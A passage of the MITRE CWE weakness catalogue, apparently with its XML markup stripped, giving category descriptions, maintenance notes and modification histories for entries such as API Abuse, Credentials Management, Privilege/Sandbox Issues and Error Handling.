It is a leftover from PLOVER, but CWE-138 is a more appropriate mapping. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Description, Functional_Areas, Name, Relationships, Type - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2010-06-21 - updated Description - - General Special Element Problems - - - - Weaknesses in this category are typically introduced during the configuration of the software. - - - 14 - Server Misconfiguration - - - 15 - Application Misconfiguration - - - - Further discussion about this category was held over the CWE Research mailing list in early 2020. No definitive action has been decided. - This entry is a Category, but various sources map to it anyway despite CWE guidance that Categories should not be mapped. In this case, there are no clear CWE Weaknesses that can be utilized. "Inappropriate Configuration" might be better described as a Weakness, so this entry might be converted to a Weakness in a later version. Further research is required, however, as a "configuration weakness" might be Primary to many other CWEs, i.e., it might be better described in terms of chaining relationships. - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Detection_Factors - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Maintenance_Notes, Relationships - - - - - This category has been deprecated. It was originally intended as a "catch-all" for input validation problems in technologies that did not have their own CWE, but introduces unnecessary depth to the hierarchy. - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2014-06-23 - updated Applicable_Platforms, Modes_of_Introduction, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Description, Modes_of_Introduction, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Type - - Technology-Specific Special Elements - - - - This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Description, Maintenance_Notes, Name, Relationships, Type - - Code - - - - This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. Weaknesses in this category were related to improper handling of data within protection mechanisms that attempt to perform neutralization for untrusted data. These weaknesses can be found in other similar categories. - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2011-06-01 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Related_Attack_Patterns, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships, Type - - - CWE Content Team - MITRE - 2021-03-15 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2021-07-20 - updated References - - Cleansing, Canonicalization, and Comparison Errors - - - - This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. - - - Landwehr - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings, Type - - Source Code - - - - Weaknesses in this category are related to improper calculation or conversion of numbers. - - - - - - - - - - - - - - - - - INT01-PL - Use small integers when precise computation is required - CWE More Abstract - - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - - - - Weaknesses in this category are typically found in functionality that processes data. Data processing is the manipulation of input to retrieve or save information. - - - - - - - - - - - - - - - - - - - - - - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Name, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - Data Handling - - - - Weaknesses in this category are related to improper handling of sensitive information. - - - - - - - - - - - - - - - - - - - - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - This category represents one of the phyla in the Seven Pernicious Kingdoms vulnerability classification. It includes weaknesses that are typically introduced during unexpected environmental conditions. According to the authors of the Seven Pernicious Kingdoms, "This section includes everything that is outside of the source code but is still critical to the security of the product that is being created. Because the issues covered by this kingdom are not directly related to source code, we separated it from the rest of the kingdoms." - - - - - - - - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Maintenance_Notes, Name - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - Environment - - - - This category has been deprecated. It was originally used for organizing weaknesses involving file names, which enabled access to files outside of a restricted directory (path traversal) or to perform operations on files that would otherwise be restricted (path equivalence). Consider using either the File Handling Issues category (CWE-1219) or the class Use of Incorrectly-Resolved Name or Reference (CWE-706). - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Description, Potential_Mitigations, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships, Type - - - CWE Content Team - MITRE - 2021-03-15 - updated Taxonomy_Mappings - - Pathname Traversal and Equivalence Errors - - - - This category represents one of the phyla in the Seven Pernicious Kingdoms vulnerability classification. It includes weaknesses that involve the software using an API in a manner contrary to its intended use. According to the authors of the Seven Pernicious Kingdoms, "An API is a contract between a caller and a callee. The most common forms of API misuse occurs when the caller does not honor its end of this contract. For example, if a program does not call chdir() after calling chroot(), it violates the contract that specifies how to change the active root directory in a secure fashion. Another good example of library abuse is expecting the callee to return trustworthy DNS information to the caller. In this case, the caller misuses the callee API by making certain assumptions about its behavior (that the return value can be used for authentication purposes). One can also violate the caller-callee contract from the other side. For example, if a coder subclasses SecureRandom and returns a non-random value, the contract is violated." - - - - - - - - - - - - - - - WIN30-C - Properly pair allocation and deallocation functions - CWE More Abstract - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Name, Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-12-13 - updated Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Observed_Examples, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Alternate_Terms, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, References, Relationships - - API Abuse - Failure to Fulfill API Contract (aka 'API Abuse') - Failure to Fulfill API Contract ('API Abuse') - Improper Fulfillment of API Contract ('API Abuse') - - - - Functions that manipulate strings encourage buffer overflows. - - - Often Misused: Strings - - - SFP10 - Incorrect Buffer Length Computation - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Applicable_Platforms, Demonstrative_Examples, Relationships, White_Box_Definitions - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-06-25 - updated References - - - - - Software security is not security software. Here we're concerned with topics like authentication, access control, confidentiality, cryptography, and privilege management. - - - - - - - - - - - - - - - - Security Features - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Name, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Security Features - - - - Weaknesses in this category are related to the management of credentials. - - - - - - - - - - - - - - - - - - - A3 - Broken Authentication and Session Management - CWE More Specific - - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Detection_Factors - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Name, Relationships - - Credentials Management - - - - Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. - - - Permissions, Privileges, and ACLs - - - - - - - This entry heavily overlaps other categories and has been marked obsolete. - This entry is a Category, but various sources map to it anyway despite CWE guidance that Categories should not be mapped. Future mappings should use an appropriate weakness going forward. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Maintenance_Notes, Relationships - - - - - Weaknesses in this category occur with improper handling, assignment, or management of privileges. A privilege is a property of an agent, such as a user. It lets the agent do things that are not ordinarily allowed. For example, there are privileges which allow an agent to perform maintenance functions such as restart a computer. - - - - - - - - - - - - - - - - - - Privilege / sandbox errors - - - - This can strongly overlap authorization errors. - A sandbox could be regarded as an explicitly defined sphere of control, in that the sandbox only defines a limited set of behaviors, which can only access a limited set of resources. - It could be argued that any privilege problem occurs within the context of a sandbox. - Many of the following concepts require deeper study. Most privilege problems are not classified at such a low level of detail, and terminology is very sparse. Certain classes of software, such as web browsers and software bug trackers, provide a rich set of examples for further research. Operating systems have matured to the point that these kinds of weaknesses are rare, but finer-grained models for privileges, capabilities, or roles might introduce subtler issues. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Relationship_Notes, Taxonomy_Mappings, Theoretical_Notes - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Research_Gaps, Theoretical_Notes - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2017-11-08 - updated Detection_Factors, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships - - Privilege / Sandbox Issues - - - - Weaknesses in this category are related to improper assignment or handling of permissions. - - - - - - - - - - - - - - Permission errors - - - A2 - Broken Access Control - CWE More Specific - - - A10 - Insecure Configuration Management - CWE More Specific - - - - - - - Permissions are associated with a resource and specify which actors are allowed to access that resource and what they are allowed to do with that access (e.g., read it, modify it). While Privileges are associated with an actor and define which behaviors or actions an actor is allowed to perform. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated References - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Detection_Factors, Functional_Areas, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Terminology_Notes - - - - - This category has been deprecated. It was originally intended as a "catch-all" for environment issues for technologies that did not have their own CWE, but it introduced unnecessary depth and complexity to the Development View (CWE-699). - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Maintenance_Notes, Name, Type - - Technology-specific Environment Issues - - - - Weaknesses in this category are related to the design and implementation of data confidentiality and integrity. Frequently these deal with the use of encoding techniques, encryption libraries, and hashing algorithms. The weaknesses in this category could lead to a degradation of the quality data if they are not addressed. - - - - - - - - - - - - - - - - Cryptographic Issues - - - - - - - This entry is a Category, but various sources map to it anyway despite CWE guidance that Categories should not be mapped. Future mappings should use an appropriate weakness going forward. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Maintenance_Notes, Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Functional_Areas, References, Related_Attack_Patterns, Relationship_Notes - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Maintenance_Notes, Relationships - - - - - Weaknesses in this category are related to errors in the management of cryptographic keys. - - - - - - - - - Key Management Errors - - - - This entry heavily overlaps other categories and has been marked obsolete. - This entry is a Category, but various sources map to it anyway despite CWE guidance that Categories should not be mapped. Future mappings should use an appropriate weakness going forward. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Observed_Examples - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Observed_Examples - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - Weaknesses in this category are related to or introduced in the User Interface (UI). - - - - - - - - - - - - - - - (UI) User Interface Errors - - - - User interface errors that are relevant to security have not been studied at a high level. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - This category represents one of the phyla in the Seven Pernicious Kingdoms vulnerability classification. It includes weaknesses related to the improper management of time and state in an environment that supports simultaneous or near-simultaneous computation by multiple systems, processes, or threads. According to the authors of the Seven Pernicious Kingdoms, "Distributed computation is about time and state. That is, in order for more than one component to communicate, state must be shared, and all that takes time. Most programmers anthropomorphize their work. They think about one thread of control carrying out the entire program in the same way they would if they had to do the job themselves. Modern computers, however, switch between tasks very quickly, and in multi-core, multi-CPU, or distributed systems, two events may take place at exactly the same time. Defects rush to fill the gap between the programmer's model of how a program executes and what happens in reality. These defects are related to unexpected interactions between threads, processes, time, and information. These interactions happen through shared state: semaphores, variables, the file system, and, basically, anything that can store information." - - - - - - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, References, Related_Attack_Patterns, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Time and State - - - - Weaknesses in this category are related to improper management of system state. - - - - - - - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - - - This category has been deprecated. It was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. Consider using the File Handling Issues category (CWE-1219). - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships, Type - - Temporary File Issues - - - - This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships, Type - - Technology-Specific Time and State Issues - - - - This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships, Type - - J2EE Time and State Issues - - - - Weaknesses in this category are related to the improper handling of signals. - - - - - - - - - Signal Errors - - - - Several weaknesses could exist, but this needs more study. Some weaknesses might be unhandled signals, untrusted signals, and sending the wrong signals. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Description, Maintenance_Notes, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2009-07-27 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-12-28 - updated Other_Notes - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Applicable_Platforms, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - - - This category represents one of the phyla in the Seven Pernicious Kingdoms vulnerability classification. It includes weaknesses that occur when an application does not properly handle errors that occur during processing. According to the authors of the Seven Pernicious Kingdoms, "Errors and error handling represent a class of API. Errors related to error handling are so common that they deserve a special kingdom of their own. As with 'API Abuse,' there are two ways to introduce an error-related security vulnerability: the most common one is handling errors poorly (or not at all). The second is producing errors that either give out too much information (to possible attackers) or are difficult to handle." - - - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - Error Handling - - - - This category includes weaknesses that occur if a function does not generate the correct return/status code, or if the application does not handle all possible return/status codes that could be generated by a function. This type of problem is most often found in conditions that are rarely encountered during the normal operation of the product. Presumably, most bugs related to common conditions are found and eliminated during development and testing. In some cases, the attacker can directly control or influence the environment to trigger the rare conditions. - - - - - - - - - - - - - - - - - - - - - - - - - Many researchers focus on the resultant weaknesses and do not necessarily diagnose whether a rare condition is the primary factor. However, since 2005 it seems to be reported more frequently than in the past. This subject needs more study. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-12-28 - updated Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Description, Other_Notes, References, Relationships, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - This category represents one of the phyla in the Seven Pernicious Kingdoms vulnerability classification. It includes weaknesses that do not directly introduce a weakness or vulnerability, but indicate that the product has not been carefully developed or maintained. According to the authors of the Seven Pernicious Kingdoms, "Poor code quality leads to unpredictable behavior. From a user's perspective that often manifests itself as poor usability. For an adversary it provides an opportunity to stress the system in unexpected ways." - - - - - - - - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Common_Consequences, Description, Detection_Factors, Name, References, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - Code Quality - Indicator of Poor Code Quality - - - - Weaknesses in this category are related to improper management of system resources. - - - - - - - - - - - - - - - - - - - - - - - - - - Resource Management Errors - - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships, 